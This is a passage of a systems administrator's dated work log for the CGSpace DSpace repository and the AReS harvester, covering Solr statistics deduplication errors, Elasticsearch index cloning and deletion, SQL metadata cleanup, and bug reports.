+<ul>
+<li>They responded with an updated CUA (6.x-4.1.10-ilri-RC7) that has a fix for the duplicates processor <em>and</em> a possible fix for the database locking issues (a bug in CUASolrLoggerServiceImpl that causes an infinite loop and a Tomcat timeout)</li>
+<li>I deployed the changes on DSpace Test and CGSpace, hopefully it will fix both issues!</li>
+</ul>
+</li>
+<li>In other news, after I restarted Tomcat on CGSpace the statistics-2013 core didn&rsquo;t come back up properly, so I exported it and imported it into the main statistics core like I did for the others a few days ago</li>
+<li>Sync DSpace Test with CGSpace&rsquo;s Solr, PostgreSQL database, and assetstore&hellip;</li>
+</ul>
+<h2 id="2020-12-09">2020-12-09</h2>
+<ul>
+<li>I was running the AtomicStatisticsUpdateCLI to remove duplicates on DSpace Test but it failed near the end of the statistics core (after 20 hours or so) with a memory error:</li>
+</ul>
+<pre tabindex="0"><code>Successfully finished updating Solr Storage Reports | Wed Dec 09 15:25:11 CET 2020
+Run 1 —  67% — 10,000/14,935 docs — 6m 6s — 6m 6s
+Exception: GC overhead limit exceeded
+java.lang.OutOfMemoryError: GC overhead limit exceeded
+        at org.noggit.CharArr.toString(CharArr.java:164)
+</code></pre><ul>
+<li>I increased the JVM heap to 2048m and tried again, but it failed with a memory error again&hellip;</li>
+<li>I increased the JVM heap to 4096m and tried again, but it failed with another error:</li>
+</ul>
+<pre tabindex="0"><code>Successfully finished updating Solr Storage Reports | Wed Dec 09 15:53:40 CET 2020
+Exception: parsing error
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: parsing error
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:530)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
+        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: org.apache.solr.common.SolrException: parsing error
+        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:45)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
+        ... 14 more
+Caused by: org.apache.http.TruncatedChunkException: Truncated chunk ( expected size: 8192; actual size: 2843)
+        at org.apache.http.impl.io.ChunkedInputStream.read(ChunkedInputStream.java:200)
+        at org.apache.http.conn.EofSensorInputStream.read(EofSensorInputStream.java:137)
+        at org.apache.solr.common.util.FastInputStream.readWrappedStream(FastInputStream.java:80)
+        at org.apache.solr.common.util.FastInputStream.refill(FastInputStream.java:89)
+        at org.apache.solr.common.util.FastInputStream.read(FastInputStream.java:125)
+        at org.apache.solr.common.util.FastInputStream.readFully(FastInputStream.java:152)
+...
+</code></pre><h2 id="2020-12-10">2020-12-10</h2>
+<ul>
+<li>The statistics-2019 core finished processing the duplicate removal so I started the statistics-2017 core</li>
+<li>Peter asked me to add ONE HEALTH to ILRI subjects on CGSpace</li>
+<li>A few items that got &ldquo;lost&rdquo; after approval during the database issues earlier this week seem to have gone back into their workflows
+<ul>
+<li>Abenet approved them again and they got new handles, phew</li>
+</ul>
+</li>
+<li>Abenet was having an issue with the date filter on AReS and it turns out that it&rsquo;s the same <code>.keyword</code> issue I had noticed before that causes the filter to stop working
+<ul>
+<li>I fixed the filter to use the correct field name and filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/63">https://github.com/ilri/OpenRXV/issues/63</a></li>
+</ul>
+</li>
+<li>I checked the Solr statistics on DSpace Test to see if the Atmire duplicates remover was working, but now I see a comical amount of duplicates&hellip;</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/solr-stats-duplicates.png" alt="Solr stats with dozens of duplicates"></p>
+<ul>
+<li>I sent feedback about this to Atmire</li>
+<li>I will re-sync the Solr stats from CGSpace so we can try again&hellip;</li>
+<li>In other news, it has been a few days since we deployed the fix for the database locking issue and things seem much better now:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/postgres_connections_ALL-week.png" alt="PostgreSQL connections all week">
+<img src="/cgspace-notes/2020/12/postgres_locks_ALL-week.png" alt="PostgreSQL locks all week"></p>
+<h2 id="2020-12-13">2020-12-13</h2>
+<ul>
+<li>I tried to harvest a few times on OpenRXV in the last few days and every time it appends all the new records to the items index instead of overwriting it:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/openrxv-duplicates.png" alt="OpenRXV duplicates"></p>
+<ul>
+<li>I can see it in the <code>openrxv-items-final</code> index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&#39;</span> | json_pp
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>   &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>      &#34;failed&#34; : 0,
+</span></span><span style="display:flex;"><span>      &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>      &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>      &#34;total&#34; : 1
+</span></span><span style="display:flex;"><span>   },
+</span></span><span style="display:flex;"><span>   &#34;count&#34; : 299922
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/64">https://github.com/ilri/OpenRXV/issues/64</a></li>
+<li>For now I will try to delete the index and start a re-harvest in the Admin UI:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-items-final
+{&#34;acknowledged&#34;:true}%
+</code></pre><ul>
+<li>Moayad said he&rsquo;s working on the harvesting so I stopped it for now to re-deploy his latest changes</li>
+<li>I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server</li>
+<li>I deleted both items indexes and restarted the harvesting:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-items-final
+$ curl -XDELETE http://localhost:9200/openrxv-items-temp
+</code></pre><ul>
+<li>Peter asked me for a list of all submitters and approvers that were active recently on CGSpace
+<ul>
+<li>I can probably extract that from the <code>dc.description.provenance</code> field, for example any that contains a 2020 date:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-[0-9]{2}-*&#39;;
+</span></span></code></pre></div><h2 id="2020-12-14">2020-12-14</h2>
+<ul>
+<li>The re-harvesting finished last night on AReS but there are no records in the <code>openrxv-items-final</code> index
+<ul>
+<li>Strangely, there are 99,000 items in the temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39;</span> | json_pp
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>   &#34;count&#34; : 99992,
+</span></span><span style="display:flex;"><span>   &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>      &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>      &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>      &#34;failed&#34; : 0,
+</span></span><span style="display:flex;"><span>      &#34;successful&#34; : 1
+</span></span><span style="display:flex;"><span>   }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m going to try to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html">clone</a> the temp index to the final one&hellip;
+<ul>
+<li>First, set the <code>openrxv-items-temp</code> index to block writes (read only) and then clone it to <code>openrxv-items-final</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final&#34;}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Now I see that the <code>openrxv-items-final</code> index has items, but there are still none in AReS Explorer UI!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 99992,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>The api logs show this from last night after the harvesting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
+</span></span><span style="display:flex;"><span>[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
+</span></span><span style="display:flex;"><span>[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
+</span></span><span style="display:flex;"><span>[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
+</span></span><span style="display:flex;"><span>(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
+</span></span><span style="display:flex;"><span>    at IncomingMessage.&lt;anonymous&gt; (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
+</span></span><span style="display:flex;"><span>    at IncomingMessage.emit (events.js:326:22)
+</span></span><span style="display:flex;"><span>    at endReadableNT (_stream_readable.js:1223:12)
+</span></span><span style="display:flex;"><span>    at processTicksAndRejections (internal/process/task_queues.js:84:21)
+</span></span></code></pre></div><ul>
+<li>But I&rsquo;m not sure why the frontend doesn&rsquo;t show any data despite there being documents in the index&hellip;</li>
+<li>I talked to Moayad and he reminded me that OpenRXV uses an alias to point to temp and final indexes, but the UI actually uses the <code>openrxv-items</code> index</li>
+<li>I cloned the <code>openrxv-items-final</code> index to <code>openrxv-items</code> index and now I see items in the explorer UI</li>
+<li>The PDF report was broken and I looked in the API logs and saw this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>(node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
+</span></span><span style="display:flex;"><span>    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
+</span></span><span style="display:flex;"><span>    at processTicksAndRejections (internal/process/task_queues.js:97:5)
+</span></span></code></pre></div><ul>
+<li>I installed <code>unoconv</code> in the backend api container and now it works&hellip; but I wonder why this changed&hellip;</li>
+<li>Skype with Abenet and Peter to discuss AReS that will be shown to ILRI scientists this week
+<ul>
+<li>Peter noticed that <a href="https://hdl.handle.net/10568/110133">this item</a> from the <a href="https://cgspace.cgiar.org/handle/10568/24450">ILRI policy and research briefs</a> collection is missing in AReS, despite it being added one month ago in CGSpace and me harvesting on AReS last night
+<ul>
+<li>The item appears fine in the REST API when I check the items in that collection</li>
+</ul>
+</li>
+<li>Peter also noticed that <a href="https://hdl.handle.net/10568/110447">this item</a> appears twice in AReS
+<ul>
+<li>The item is <em>not</em> duplicated on CGSpace or in the REST API</li>
+</ul>
+</li>
+<li>We noticed that there are 136 items in the ILRI policy and research briefs collection according to AReS, yet on CGSpace there are only 132
+<ul>
+<li>This is confirmed in the REST API (using <a href="https://github.com/davesnx/query-json">query-json</a>):</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=0&#39; | json_pp &gt; /tmp/policy1.json
+$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=100&#39; | json_pp &gt; /tmp/policy2.json
+$ query-json &#39;.items | length&#39; /tmp/policy1.json
+100
+$ query-json &#39;.items | length&#39; /tmp/policy2.json
+32
+</code></pre><ul>
+<li>I realized that the issue of missing/duplicate items in AReS might be because of this <a href="https://jira.lyrasis.org/browse/DS-3849">REST API bug that causes /items to return items in non-deterministic order</a></li>
+<li>I decided to cherry-pick the following two patches from DSpace 6.4 into our <code>6_x-prod</code> (6.3) branch:
+<ul>
+<li>High CPU usage when calling the collection_id/items REST endpoint
+<ul>
+<li>Jira: <a href="https://jira.lyrasis.org/browse/DS-4342">https://jira.lyrasis.org/browse/DS-4342</a></li>
+<li>c2e6719fa763e291b81b2d61da2f8c758fe38ff3</li>
+</ul>
+</li>
+<li>REST API items resource returns items in non-deterministic order
+<ul>
+<li>Jira: <a href="https://jira.lyrasis.org/browse/DS-3849">https://jira.lyrasis.org/browse/DS-3849</a></li>
+<li>2a2ea0cb5d03e6da9355a2eff12aad667e465433</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>After deploying the REST API fixes I decided to harvest from AReS again to see if the missing and duplicate items get fixed
+<ul>
+<li>I made a backup of the current <code>openrxv-items-temp</code> index just in case:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><h2 id="2020-12-15">2020-12-15</h2>
+<ul>
+<li>After the re-harvest last night there were 200,000 items in the <code>openrxv-items-temp</code> index again
+<ul>
+<li>I cleared the core and started a re-harvest, but Peter sent me a bunch of author corrections for CGSpace so I decided to cancel it until after I apply them and re-index Discovery</li>
+</ul>
+</li>
+<li>I checked the 1,534 fixes in Open Refine (had to fix a few UTF-8 errors, as always from Peter&rsquo;s CSVs) and then applied them using the <code>fix-metadata-values.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
+</span></span><span style="display:flex;"><span>$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -m <span style="color:#ae81ff">3</span>
+</span></span></code></pre></div><ul>
+<li>Since I was re-indexing Discovery anyways I decided to check for any uppercase AGROVOC and lowercase them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>BEGIN
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 406
+</span></span><span style="display:flex;"><span>dspace=# COMMIT;
+</span></span><span style="display:flex;"><span>COMMIT
+</span></span></code></pre></div><ul>
+<li>I also updated the Font Awesome icon classes for version 5 syntax:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-rss&#39;,&#39;fas fa-rss&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-rss%&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 74
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-at&#39;,&#39;fas fa-at&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-at%&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 74
+</span></span><span style="display:flex;"><span>dspace=# COMMIT;
+</span></span></code></pre></div><ul>
+<li>Then I started a full Discovery re-index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;</span>
+</span></span><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    265m11.224s
+</span></span><span style="display:flex;"><span>user    171m29.141s
+</span></span><span style="display:flex;"><span>sys     2m41.097s
+</span></span></code></pre></div><ul>
+<li>Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow</li>
+<li>Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn&rsquo;t see any anymore&hellip;
+<ul>
+<li>Indeed I spent a few minutes looking randomly and I didn&rsquo;t find any either&hellip;</li>
+<li>I did, however, see lots of duplicates in countryCode_search, countryCode_ngram, ip_search, ip_ngram, userAgent_search, userAgent_ngram, referrer_search, referrer_ngram fields</li>
+<li>I sent feedback to them</li>
+</ul>
+</li>
+<li>On the database locking front we haven&rsquo;t had issues in over a week and the Munin graphs look normal:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/postgres_connections_ALL-week2.png" alt="PostgreSQL connections all week">
+<img src="/cgspace-notes/2020/12/postgres_locks_ALL-week2.png" alt="PostgreSQL locks all week"></p>
+<ul>
+<li>After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the <code>openrxv-items-temp</code> index was empty and that the backup index I made yesterday was still there:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;acknowledged&#34; : true
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 0,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 99992,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><h2 id="2020-12-16">2020-12-16</h2>
+<ul>
+<li>The harvesting on AReS finished last night so this morning I manually cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>
+<ul>
+<li>First check the number of items in the temp index, then set it to read only, then delete the items index, then delete the temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100046,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#34;http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty&#34;</span>
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100046,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Interestingly <a href="https://hdl.handle.net/10568/110447">the item</a> that we noticed was duplicated now only appears once</li>
+<li>The <a href="https://hdl.handle.net/10568/110133">missing item</a> is still missing</li>
+<li>Jane Poole noticed that the &ldquo;previous page&rdquo; and &ldquo;next page&rdquo; buttons are not working on AReS
+<ul>
+<li>I filed a bug on GitHub: <a href="https://github.com/ilri/OpenRXV/issues/65">https://github.com/ilri/OpenRXV/issues/65</a></li>
+</ul>
+</li>
+<li>Generate a list of submitters and approvers active in the last months using the Provenance field on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -U postgres dspace -c <span style="color:#e6db74">&#34;SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-(06|07|08|09|10|11|12)-*&#39;&#34;</span> &gt; /tmp/provenance.txt
+</span></span><span style="display:flex;"><span>$ grep -o -E <span style="color:#e6db74">&#39;by .*)&#39;</span> /tmp/provenance.txt | grep -v -E <span style="color:#e6db74">&#34;( on |checksum)&#34;</span> | sed -e <span style="color:#e6db74">&#39;s/by //&#39;</span> -e <span style="color:#e6db74">&#39;s/ (/,/&#39;</span> -e <span style="color:#e6db74">&#39;s/)//&#39;</span> | sort | uniq &gt; /tmp/recent-submitters-approvers.csv
+</span></span></code></pre></div><ul>
+<li>Peter wanted it to send some mail to the users&hellip;</li>
+</ul>
+<h2 id="2020-12-17">2020-12-17</h2>
+<ul>
+<li>I see some errors from CUA in our Tomcat logs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
+</span></span><span style="display:flex;"><span>Error while updating
+</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>I sent the full stack to Atmire to investigate
+<ul>
+<li>I know we&rsquo;ve had this &ldquo;Multiple update components target the same field&rdquo; error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update</li>
+</ul>
+</li>
+<li>I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author&rsquo;s names, but it throws an error&hellip;</li>
+</ul>
